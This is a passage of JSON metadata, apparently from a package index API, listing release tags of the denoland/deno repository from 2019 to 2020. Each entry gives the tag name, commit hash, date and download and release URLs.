d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_p